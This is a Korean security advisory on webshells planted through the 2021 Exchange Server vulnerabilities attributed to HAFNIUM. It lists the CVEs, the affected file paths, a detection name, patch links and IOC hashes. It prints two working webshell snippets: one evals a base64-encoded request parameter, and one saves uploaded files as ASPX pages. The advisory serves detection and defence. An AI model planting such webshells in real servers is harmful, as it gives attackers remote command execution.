Microsoft 는 지난 3월 2일 MS Exchange Server 와 관련된 아래 7 개의 원격 명령 실행 취약점을 보고하였다. 해당 취약점은 Exchange Server 에 대한 인증, 권한 획득, 파일 쓰기 등 을 통해 임의의 명령을 실행할 수 있게 된다. 또한 해당 공격을 통해 사용자 정보 탈취 및 악성 파일 설치 등의 추가 악성 행위가 가능하며, HAFNIUM 그룹에 의해 활발하게 악용 중이다.
- MS Exchange Server 취약점 보고
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
- MS Exchange Server 취약점
– CVE-2021-26855
– CVE-2021-26857
– CVE-2021-26858
– CVE-2021-27065
– CVE-2021-26412
– CVE-2021-26854
– CVE-2021-27078
ASEC 분석팀은 최근 해당 취약점을 이용한 공격 정황을 포착하였으며, 이 중 CVE-2021-26858 및 CVE-2021-27065 취약점과 관련된 악성 파일을 다수 확인하였다. 두 취약점은 Exchange 서버의 모든 경로에 파일 쓰기를 수행할 수 있는 취약점으로, CVE-2021-26855 취약점을 통해 Exchange 서버에 인증 후 추가 공격에 사용된다.
공격자는 Exchange 서버 인증 후 CVE-2021-26858 및 CVE-2021-27065 취약점을 통해 Microsoft Exchange Server OAB (Offline Address Book) 용 ASPX 파일에 악성 WebShell 을 삽입한다. 아래 그림은 해당 공격을 통해 정상 ASPX 파일에 삽입된 WebShell 코드이다.
ExternalUrl : http://f/<script language="JScript" runat="server">
function Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String
(Request.Item["8692275404fea72817d34e7037797201"])),"unsafe");}</script> ExternalUrl : http://g/<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0)
{ Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>
OAB 용 ASPX 파일에는 파일 생성 및 수정 시간, Exchange 버전, 서버 관련 정보 등 이 포함되어 있으며, 그 중 ExternalUrl 속성에 WebShell 이 삽입된다. WebShell 은 Set-OabVirtualDirectory cmdlet 명령어를 통해 삽입되며, WebShell 이 삽입되는 대상 파일은 아래의 경로 및 파일명을 가진다. 자사에서는 현재까지 다수의 PC 에서 대상 파일들이 감염된 것을 확인하였다.
- 대상 파일 경로
– \[IIS Install Path]\aspnet_client\
– \[IIS Install Path]\aspnet_client\system_web\
– \[Exchange Install Path]\FrontEnd\HttpProxy\owa\auth\
- 대상 파일명
– error_page.aspx
– Logout.aspx
– Shell.aspx
– RedirSuiteServerProxy.aspx
– supp0rt.aspx
– OutlookEN.aspx
- 감염 파일 경로
– C:\inetpub\wwwroot\aspnet_client\aspnet_client.aspx
– C:\inetpub\wwwroot\aspnet_client\error_page.aspx
– C:\inetpub\wwwroot\aspnet_client\load.aspx
– C:\inetpub\wwwroot\aspnet_client\Metabase.aspx
– C:\inetpub\wwwroot\aspnet_client\Shell.aspx
– C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx
– C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Logout.aspx
– C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServerProxy.aspx
해당 파일들이 감염된 경우 공격자의 명령에 따라 추가 악성 행위가 수행될 수 있다.
현재 V3 제품에서는 해당 파일에 대해 아래와 같이 진단하고 있으며, 취약점 대상 시스템일 경우 Microsoft 보안 가이드를 참고하여 업데이트가 필요하다.
[파일 진단]
Exploit/ASP.Cve-2021-27065.S1406 (2021.03.12.03)
[Microsoft 보안 업데이트 가이드]
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26412
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26854
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27078
[IOC 정보]
f435127cad1aa504c78387d8fa1c77eb
4d3453f05a6706de277b9eebf9ac52c9
0de873ac66258278d0a8fff9d989b693
fd3f42bbdc6da346bc58a05da4bdd33c
4c72d7c7507d3b8bf2a33c60c19de1a3
Categories:악성코드 정보